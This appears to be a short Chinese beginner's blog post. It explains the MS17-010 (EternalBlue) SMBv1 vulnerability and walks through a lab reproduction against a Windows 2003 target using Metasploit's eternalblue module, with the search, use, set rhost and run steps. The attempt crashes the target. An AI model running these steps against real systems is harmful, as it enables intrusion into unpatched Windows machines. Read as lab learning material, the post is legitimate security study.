来自小白的技术分享~仅供参考学习~~ 本次将与大家分享MS17-010 前言: MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向Microsoft 服务器消息块 1.0(SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。2017年,The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 漏洞影响:目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows2008、Windows 2008 R2、WindowsServer2012 SP0。 复现利用: 攻击机:kali
靶机:win 2003 server ip地址:172.16.0.105(超融合环境)
第一步打开msf,运行msfconsole
第二步:搜索ms17-010
第三步使用useexploit/windows/smb/ms17_010_eternalblu;options查看状态
第四步set rhost 172.16.0.105攻击目标IP,执行options,查看攻击模块需要的参数
第五步:run开始攻击,出现Host islikely则说明存在漏洞
第六步:出现没有会话创建(靶机蓝屏了)
后查看系统日志发现蓝屏代码为0x0000005c 对于windows 2003的MS17010复现到此~ 感谢您能看完全文~ |